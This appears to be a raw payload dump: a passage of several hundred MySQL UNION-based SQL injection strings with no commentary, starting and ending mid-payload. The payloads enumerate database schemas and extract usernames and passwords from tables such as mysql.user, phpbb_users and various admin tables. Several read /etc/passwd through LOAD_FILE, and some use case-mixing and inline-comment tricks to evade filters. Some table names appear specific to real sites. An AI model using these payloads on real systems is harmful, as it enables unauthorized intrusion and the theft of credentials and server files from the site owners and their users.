FROM information_schema.schemata -- 1' union select 1,2,3,4,5,6,7,8,TABLE_NAME,0,1,2,3 FROM INFORMATION_SCHEMA.TABLES/* -1 union select 1,2,3,4,5,6,7,8,unhex(hex(user())),unhex(hex(version())),unhex(hex(database())),12,13,14,15,16,17,18,19,20,21/* -1 union select 1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 -1 union select 1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from users/* 1 union select 1,2,3,4,5,6,7,8,version() -- -1 union select 1,2,3,4,5,6,7,8,version(),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/* 1 union select 1,2,3,4,5,6,7,8,version(),10,11/* -1 union select 1,2,3,4,5,6,7,8,version(),10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 -1 union select 1,2,3,4,5,6,7,8,version(),user(),11,12,13,14,15,16,17-- -1 union select 1,2,3,4,5,6,7,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a)-- 1 union select 1,2,3,4,5,6,7,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),9,10,11,12,13,14-- -1 union select 1,2,3,4,5,6,7,concat(database(),0x3a,version(),0x3a,user()),9-- -1 union select 1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version()),9,10,11,12,13,14/* -1 union select 1,2,3,4,5,6,7,concat(login,char(58),password),9,10,11,12,13,14,15 from users/* -1 union select 1,2,3,4,5,6,7,concat(name,0x3a3a,pass),9,10,11,12,13,14,15,16,17,18 from users limit 4,1 -1 union select 1,2,3,4,5,6,7,concat(name,0x3a,password),9,10,11,12,13,14,15 from person/* -1' UNION SELECT 1,2,3,4,5,6,7,concat(user,0x3a,password),9,11,12,13,14,15,16,17,18,19,20 FROM mysql.user/* -1 union select 1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database())/* -1 union select 1,2,3,4,5,6,7,concat(version(),0x3a,user(),0x3a,database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22/* -1 Union select 1,2,3,4,5,6,7,concat(version(),0x3a,user(),0xa3,database()),9 -1 union select 1,2,3,4,5,6,7,concat_ws(0x20,uid,name,login,pass,mail,status),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 from users-- -1 union select 1,2,3,4,5,6,7,concat_ws(0x2F,cast(version() as binary),cast(database() as binary),cast(user() as binary)),9,10/* -1 union select 1,2,3,4,5,6,7,concat_ws(0x2F,version(),database(),user())/* -1 union select 1,2,3,4,5,6,7,concat_ws(0x3a,AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71)),9,10,11,12,13,14,15,16,17,18,19,20,21,22 from mysql.user -- -1 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11 -1 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- -1 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user_name,user_password,email),9,10,11 from users limit 1,1/* -1 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),9,10 -- -1 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65-- -1 union select 1,2,3,4,5,6,7,concat_ws(0x3A,version(),user(),database()),9,10-- -1 union select 1,2,3,4,5,6,7,convert(password using cp1251) from mysql.user/* -1 UNION SELECT 1,2,3,4,5,6,7,group_concat(schema_name SEPARATOR 0x0b),9,10,11,12,13 FROM information_schema.schemata -1 union select 1,2,3,4,5,6,7,group_concat(user_name,0x3a,passwd,0x3b),9,10 from users -- -1 union select 1,2,3,4,5,6,7,group_concat(username,0x3a,user_password),9,10 from z_phpbb_users -- -1 UNION SELECT 1,2,3,4,5,6,7,GROUP_CONCAT(version(),0x3a,database(),0x3a,user()),9,10,11,12,13,14,15,16-- -1 union select 1,2,3,4,5,6,7,LOAD_FILE('/etc/passwd'),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -1 union select 1,2,3,4,5,6,7,table_name,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.tables-- 1' union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15 -- -1 union select 1,2,3,4,5,6,7,user,9 from mysql.user-- -1 union select 1,2,3,4,5,6,7,user(),version(),database()-- -1 union select 1,2,3,4,5,6,7,version(),9-- -1' UNION SELECT 1,2,3,4,5,6,7,version(),9 -- -1 union select 1,2,3,4,5,6,7,version(),9,10,11,12,13-- -1 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,11,12,13,14 -- -1 union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17/* -1 union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 1 union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- 1 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 -- -1 UNION SELECT 1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,User(),0x7873716C696E6A656E64),0x71),0x71),8,9,10,11,12,13 -1 union select 1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),8,9,10,11,12,13,14,15,16/* -1' union select 1,2,3,4,5,6,column_name,8,9,0,10,11,12,13,14,15,16,17,18,19,20 CPU_USER from information_schema.columns/* -1 union select 1,2,3,4,5,6,concat(database(),char(58),user(),char(58),version()),8,9,10,11,12,13,14,15/* -1 union select 1,2,3,4,5,6,concat(email,char(58),pwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from users limit 1,1/* -1 union select 1,2,3,4,5,6,concat(login,0x3a3a,password),8 from users limit 1,10/* -1 union select 1,2,3,4,5,6,concat(login,0x3a,pwd),8,9,10,11 from danilov_users/* -1 union select 1,2,3,4,5,6,concat(name,0x3a,uname,0x3a,pass),8,9,10,11,12,13 from users limit 0,1/* -1 union select 1,2,3,4,5,6,concat(name,char(58),height,char(58),weight,char(58),country,char(58),position),8,9,10,11,12,13,14,15,16,17,18,19,20 from players limit 0,1/* -1 union select 1,2,3,4,5,6,concat(table_name,0x3a,column_name),8,9,10,11,12,13,14,15,16 from information_schema.columns where column_name like 0x257061737325-- 1 union select 1,2,3,4,5,6,concat(uname,0x3a,pass),8,9,1,2,3,4,5,6,7,8,9,1,2 from u26773.ars_users limit 1,1/* -1 union select 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11-- -1 union select 1,2,3,4,5,6,concat(user,0x3a,password),8,9 from mysql.user limit 1,1/* -1 union select 1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9/* -1 union select 1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9,10,11,12,13/* -1' union select 1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/* -1 union select 1,2,3,4,5,6,concat(user,char(58),pass),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from users/* -1 union select 1,2,3,4,5,6,concat(username,0x3a3a,password,0x3a3a,admin),8,9,10,11,12,13,14,15,16 from phorum_users limit 0,50/* -1 union select 1,2,3,4,5,6,concat(username,char(58),user_email,char(58),user_icq,char(58),user_password),8 from phpbb_users/* -1 union select 1,2,3,4,5,6,concat(version(),0x2F,database(),0x2F,user()),8,9/* -1 union select 1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())/* -1 UNION SELECT 1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user()),8,9,10 -- -1 union select 1,2,3,4,5,6,concat(version(),0x3a,user(),0x3a,database()),8,9,10,11,12 -- -1 union select 1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()) -1 union select 1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8/* -1 union select 1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9/* -1' union select 1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9/* 1' union select 1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -1 UnIoN SeLeCT 1,2,3,4,5,6,concat_ws(0x3a3a,id,about,contact,pw,log,email,phone,copyr,diz,top_zagl,title_main,desc_main,title_about,desc_about,title_contact,desc_contact,keywords,center_footer,logo_file,phone_file,title_clients,desc_clients,title_order,desc_order,main_page_text,about_page_text,contacts_page_text,counter_block),8,9 from aion_config -- -1 union select 1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11 -- -1 union select 1,2,3,4,5,6,concat_ws(0x3a,database(),user(),version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -1 union select 1,2,3,4,5,6,concat_ws(0x3a,database(),version(),user()),8,9-- -1 union select 1,2,3,4,5,6,concat_ws(0x3a,id,login,email),8,9,10,11,12,13,14,15 from accounts limit 0,1/* -1 union select 1,2,3,4,5,6,concat_ws(0x3a,LOGIN,0x3a,PASSWORD),8,9,10 from tbl_admin -- -1 union select 1,2,3,4,5,6,concat_ws(0x3a,name,password),8 from users-- -1 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,nickname,password,email),8,9 FROM user/* -1 union select 1,2,3,4,5,6,concat_ws(0x3a,table_name),8,9,10,11,12,13,14 from information_schema.tables limit 17,1/* -1 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10/* -1' union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10 -- -1 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12/* -1 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14 -- -1 union select 1,2,3,4,5,6,concat_Ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14 -1 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* -1 union select 1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18,19,20 from users limit 1,1 -1 union select 1,2,3,4,5,6,concat_ws(0x3a,user_name,user_password),8,9,10,11,12 from users-- -1 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/* 1 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 -- -1 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10/* -1 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()) from admin/* -1 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20-- -1 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 -- -1' union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user())/* -1 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/* -1 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11/* -1 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12-- -1' UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,VERSION(),DATABASE(),USER()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/* -1 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8 -1 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database())-- 1' union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12/* -1 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),.8,9,10,11,12,13,14-- -1 union select 1,2,3,4,5,6,concat_ws(0x3C62722F3E,USER(),DATABASE(),VERSION()),8,9,10,11,12,13 1 union select 1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from stat.users/* -1 union select 1,2,3,4,5,6,database(),8 /* -1 union select 1,2,3,4,5,6,database(),8,9-- 1 union select 1,2,3,4,5,6,file_priv,8,9,10,11,12,13,14,15,16 from mysql.user -- -1 union select 1,2,3,4,5,6 from table/* -1 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61 1 union select 1,2,3,4,5,6,id_user,8,9,10 from user/* -1 union select 1,2,3,4,5,6,null,8-- -1 union select 1,2,3,4,5,6,UNHEX(HEX(concat_ws(0x3a,user(),database(),version()))),8,9,10,11,12,13,14 1 union select 1,2,3,4,5,6,user,password,9,10,11,12,13 from users/* -1 union select 1,2,3,4,5,6,version(),8,9/* 1' union select 1,2,3,4,5,6,version(),8,9,10,11,12/* -1 union select 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15/* -1 UNION SELECT 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19-- -1' union select 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 -- -1 union select 1,2,3,4,5,6,version(),8,user(),10,11,12,13,14,15,16,17,18,19,20-- -1 union select 1,2,3,4,5,6,version(),database(),session_user(),10,11,12,13,14,15,16,17,18,19,20/* -1 union select 1,2,3,4,5,6,version(),user(),database(),10,11,12,13/* -1 union select 1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),7,8,9,10,11,12/* -1 union select 1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(';',DATABASE(),USER(),VERSION()),0x71),0x71),7 -- -1 union select 1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),7,8,9,10/* -1 union select 1,2,3,4,5,aes_decrypt(aes_encrypt(version(),0x71),0x71),7,8,9,10,11/* -1 union select 1,2,3,4,5,aes_decrypt(aes_encrypt(version(),1),1),7,8,9/* -1 union select 1,2,3,4,5,CHAR(104,101,107,32,98,121,32,103,101,110,111,109,45,45),7,8,9,10,11,12,13,14/* -1 UNION SELECT 1,2,3,4,5,char(241,234,243,235,255,32,229,225,224,242,252,32,229,229,32,226,32,240,238,242),7,8/* -1 union select 1,2,3,4,5,concat(0x3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a,user_login,0x3a3a,user_password),7,8 from sys_users limit 1,1 -1 union select 1,2,3,4,5,concat(0x3a3a,login_user,0x3a3a,pass_user),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from haers.user limit 30,190 -1 union select 1,2,3,4,5,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a)-- -1 union select 1,2,3,4,5,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),7,8-- -1 union select 1,2,3,4,5,concat(email,0x3a,password),7,8 from users/* - 1 union select 1,2,3,4,5,concat(id,0x20,user_name,0x3a,user_pass),7 from users where id=0/* -1 union select 1,2,3,4,5,concat(id,0x3a,user,0x3a,pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from users/* -1 union select 1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11 from users limit 0,1/* -1 union select 1,2,3,4,5,concat(login,char(58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tbl_admin_users -- -1' union select 1,2,3,4,5,concat(name,0x3a,password,0x3a,icq_number),7,8 from vitz_forums.ibf_members/* -1 union select 1,2,3,4,5,concat(table_name,0x20,column_name,0x20,table_schema),7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns limit 1,1/* -1) union select 1,2,3,4,5,concat(table_schema,0x3a,table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where column_name=0x70617373776F7264 -- -1 union select 1,2,3,4,5,concat(uname,0x3a,pass),null,uid,9,10,email from users limit 1,1/* -1 union select 1,2,3,4,5,concat(user,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124 from mysql.user/* -1 union select 1,2,3,4,5,concat(user,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from mysql.user limit 1,1/* -1 union select 1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database())/* -1' union select 1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database())/* -1 union select 1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -1 UNION SELECT 1,2,3,4,5,concat(user(),0x3a,version(),database()),7,8,9,10,11,12,13 -1 union select 1,2,3,4,5,concat(username,0x3a3a,password),7 from authenticate limit 0,10 -1 union select 1,2,3,4,5,concat(username,0x3a,pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from users limit 0,1/* -1' union select 1,2,3,4,5,concat(username,0x3a,user_password,0x3a,user_icq),7,8,9,10,11,12 from phpbb_users limit 1,1/* -1 union select 1,2,3,4,5,concat(username,char(58),password),7,8,9 from vb_user/* -1 union select 1,2,3,4,5,concat(username,char(58),user_password),7,8,9 from forum.phpbb_users limit 1,1/* -1 union select 1,2,3,4,5,concat(version(),0x2F,database(),0x2F,user())/* -1 UNION select 1,2,3,4,5,concat(version(),char(58),user()),7,8,9,10/* -1 union select 1,2,3,4,5,concat_ws(0x05,version(),database(),user()),7,8,9,10,11,12/* -1 union select 1,2,3,4,5,concat_ws(0x203a20,user(),version(),database()),count(concat_ws(0x203a20,table_schema,table_name,column_name)),8,9,10,11,12,13,14,15 from information_schema.columns where column_name="passwd" or column_name="password" or column_name="pass" -1 union select 1,2,3,4,5,concat_ws(0x2a,login,password),7 FROM auth limit 0,1-- -1 union select 1,2,3,4,5,concat_ws(0x2a,password),7,8,9,10 from fmpnet_faq.faq_admin-- -1 union select 1,2,3,4,5,concat_ws(0x2a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- -1' union select 1,2,3,4,5,concat_ws(0x2F,cast(version() as binary),cast(database() as binary),cast(user() as binary)),7,8,9/* -1 union select 1,2,3,4,5,concat_ws(0x2F,version(),database(),user()),7,8,9/* -1 union select 1,2,3,4,5,concat_ws(0x2F,version(),database(),user()),7,8,9,10/* -1 union select 1,2,3,4,5,concat_ws(0x2F,version(),database(),user()),7,8,9,10,11/* -1 union select 1,2,3,4,5,concat_ws(0x3a3a3a,version(),database(),user())-- -1 union select 1,2,3,4,5,concat_ws(0x3a3a3a,version(),database(),user()),7,8,9-- -1 union select 1,2,3,4,5,concat_ws(0x3a3a,name,pwd),7,8,9,10,11,12,13,14,15,16,17 from users limit 0,1/* -1 union select 1,2,3,4,5,concat_ws(0x3a3a,usuarios_user,usuarios_pass),7,8,9,10 from usuarios limit 0,1/* -1 union select 1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database()),7,8-- -1 union select 1,2,3,4,5,concat_ws(0x3a,convert(username using latin1),convert(password using latin1)),7 from admin/* 1 union select 1,2,3,4,5,concat_ws(0x3a,database(),version(),user())-- -1 union select 1,2,3,4,5,concat_ws(0x3a,database(),version(),user()),7-- -1 union select 1,2,3,4,5,concat_ws(0x3a,email,username,thepass),7,8,9,10,11,12,13,14,15,16,17,18 from users-- -1' union select 1,2,3,4,5,concat_ws(0x3a,id,login,password,name,eMail,encrypted) from System limit 4,630/* -1 union select 1,2,3,4,5,concat_ws(0x3a,ID,username,password,level),7,8,9,10,11,12 from tbl_adminarea-- -1 union select 1,2,3,4,5,concat_ws(0x3a,Num,Username,Password),7,8,9,10,11,12,13,14 from admin_eq-- -1 union select 1,2,3,4,5,concat_ws(0x3a,uname,pass,name,email),7 from admin-- -1 union select 1,2,3,4,5,concat_ws(0x3a,USER(),DATABASE(),VERSION()) -1 union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8-- -1 UNION SELECT 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15 -- 1 union select 1,2,3,4,5,concat_Ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17-- -1 union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20 -1 UNION SELECt 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -1 union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17,18 -- -1 union select 1,2,3,4,5,concat_ws(0x3a,username,password),7,8 from users-- 1 union select 1,2,3,4,5,concat_ws(0x3a,username,password) from logins-- -1 union select 1,2,3,4,5,concat_ws(0x3a,username,user_password),7,8,9,10,11,12 from user -- -1 union select 1,2,3,4,5,concat_ws(0x3a,user,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 from mysql.user/* -1' union select 1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10 from fastpublish__forum_de_userdata/* -1 union select 1,2,3,4,5,concat_ws(0x3A,user(),@@version,database()),7,8,9,10 -- -1 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15/* 1 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16-- -1 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17/* -1 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),7-- -1 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7-- -1 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7/* 1 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8/* -1 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9-- 1 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14/* -1 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -1 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16-- -1 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()) -- -1' union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database())/* -1 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,3,14,15,16,17,18,19,20,21,22-- -1 union select 1,2,3,4,5,concat_ws(0x3,version(),user(),database())/* -1 union select 1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9 -- -1 UNION SELECT 1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9,10-- -1 union select 1,2,3,4,5,convert(concat(database(),char(58),user(),char(58),version()),char),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -1 union select 1,2,3,4,5,convert(concat_ws(0x3b,user(),database(),version()) using latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -1 union select 1,2,3,4,5,convert(version() using cp1251),7,8,9,10/* 1 union select 1,2,3,4,5,convert(version() using cp1251),concat(convert(password using cp1251),char(58),convert(user using cp1251)),8,9,10 from mysql.user/* 1 union select 1,2,3,4,5,database(),version(),user(),null,null,11,12,13,14,15,16,17,18,19,20,21,22,23-- -1 union select 1,2,3,4,5,email,7,8,9,10,11,12,13,14 from clientes -- -1'/*--*/UnIoN/*--*/SeLeCt/*--*/1,2,3,4,5,file_priv,7,8,9/*--*/FrOm/*--*/mysql.user-- -1 UNION SELECT 1,2,3,4,5 from konkurs/* -1 UNION SELECT 1,2,3,4,5 FROM null.user/* -1 union select 1,2,3,4,5 from users limit 0,1/* -1 union select 1,2,3,4,5,group_concat(0x0b,table_name),7 from information_schema.tables -- -1 union select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13 from information_schema.tables where table_schema=0x7070656c626132325f666f746f-- 1 union select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12 from information_schema.tables-- -1 union select 1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10 from members -- -1 UNION SELECT 1,2,3,4,5,group_concat(username,0x3B,password SEPARATOR 0x0b),7,8,9,10,11,12,13,14 FROM dbpd.pd_users 1" UNION SELECT 1,2,3,4,5 ipoker_users/* -1 union select 1,2,3,4,5,load_file(0x2f6574632f706173737764),7,8,9,10,11,12,13,14,15-- -1 union select 1,2,3,4,5,load_file(char(47,101,116,99,47,112,97,115,115,119,100,45)),7,8,9,0/* -1' union select 1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19 from files -- -1 union select 1,2,3,4,5,login,passwd,8 from ethology_users limit 2,1/* -1 union select 1,2,3,4,5,login,password,8,9 from users/* -1' union select 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables/* -1 union select 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15 from information_schema.tables news limit 24,1-- -1 union select 1,2,3,4,5,table_name,7,8,9,10,11,12 from information_schema.columns/* -1 union /*!select*/ 1,2,3,4,5,unhex(hex(tAbLE_NaME)),7,8 from information_schema./**/tables limit 0,1-- -1 union select 1,2,3,4,5,user(),7,8,9,10,11 -- -1 union select 1,2,3,4,5,user(),7,database(),version(),10,11,12,13,14,15,16,17,18,19,20,21/* 1 union select 1,2,3,4,5,userLogin,userPassword,8,9,10,11,12,13,14,15 from admins/* -1 union select 1,2,3,4,5,USER(),VERSION(),8,9,0,1,2,3,4,5,6,7,8,9,0,1/* -1 union select 1,2,3,4,5,version()/* 1' union select 1,2,3,4,5,version(),7,8,10,11,12,13/* -1 union select 1,2,3,4,5,version(),7,8,9 -- -1 union select 1,2,3,4,5,version(),7,8,9,10,11 -- -1 UNION SELECT 1,2,3,4,5,@@version,7,8,9,10,11-- -1 union select 1,2,3,4,5,VERSION(),7,8,9,10,11,12,13/* -1 union select 1,2,3,4,5,@@version,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -1 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/* -1' union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -- -1 union select 1,2,3,4,^,6,7,8,9,10-- -1 union select 1,2,3,4,aes_decrypt(aes_encrypt(concat(version(),0x3a,user(),0x3a,database()),0x71),0x71),6,7/* -1 union /*!select*/ 1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71),6,7,8,9,10,11,12,13,14,15 -- -1 union select 1,2,3,4,aes_decrypt(aes_encrypt(user(),0x71),0x71),6,7/* -1 union select 1,2,3,4,cast(concat_ws(0x3a,version(),database(),user()) as binary),6,7,8,9,10,11-- -1 union select 1,2,3,4,char(0xea,0xf3,0xf1,0xee,0xea,0x20,0xe4,0xe5,0xf0,0xfc,0xec,0xe0),2,7/* -1 union select 